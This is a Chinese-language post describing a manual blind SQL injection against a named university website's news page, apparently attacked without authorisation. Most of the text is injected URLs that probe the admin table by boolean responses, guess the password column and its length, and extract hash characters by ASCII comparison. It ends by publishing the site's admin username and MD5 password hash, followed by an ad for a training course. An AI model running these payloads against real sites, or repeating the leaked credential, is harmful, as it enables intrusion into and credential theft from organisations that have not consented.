一次sql注入实例
目标:http://www.ieidjtu.edu.cn/news.asp?id=147 只是随便测试找到的,本想直接使用 啊D直接搞定,但是发现 啊D的结果不是很满意,
很是悲哀,不能猜到密码字段,本想放弃,但总觉得太可惜了,还是发扬一下 黑客精神吧,手工操作,但用户名字段的不是很复杂,所以猜想密码字段也不会是很复杂,因此开猜..
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20count(pword)%20from%20admin)>0失败
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20count(pws)%20from%20admin)>0失败
但怎么说人品还是不错的,当
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20count(pass)%20from%20admin)>0 页面返回正常了 千里之行刚刚开始,猜长度吧 既然手动猜解,人脑总比工具灵活吧,这也是人为人,工具是工具的主要原因,呵呵,直接判断是否是32位或者16位。因为一般都是加密的嘛,现在真是很少有明文的,但遇到明文是我的人品差...
没办法人品就是好
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20len(pass)%20from%20admin)=32 返回正常
猜测内容吧,还等啥呀,开始第一位
先判断是否是数字 0-9 Ascii 48-57
a-z Ascii 97-122
A-Z Ascii 65-90
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,1,1))%20from%20admin)>48正常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,1,1))%20from%20admin)>57 失败
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,1,1))%20from%20admin)>53 正常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,1,1))%20from%20admin)>55正常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,1,1))%20from%20admin)>56 异常 说明 第一位是 56 对应是 8
开始第二位
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>57 正常 说明不是数字
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>97 正常 说明是小写字母
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>122 异常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>110 异常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>102 异常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>100 异常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>98 正常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)>99 正常
http://www.ieidjtu.edu.cn/news.asp?id=147%20and%20(select%20top%201%20asc(mid(pass,2,1))%20from%20admin)=100 正常 说明是 100 第二位是 100 对应ascii码 d
下面就不做了 直接使用啊D将猜到的 密码字段直接加入 设置中 重新扫描就可以了,最终得到 用户名 admin 密码8de3500fd334b6b7180a2156cfa5132e
但是也很悲剧 这个md5不能破解 郁闷了 没有办法 呵呵
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课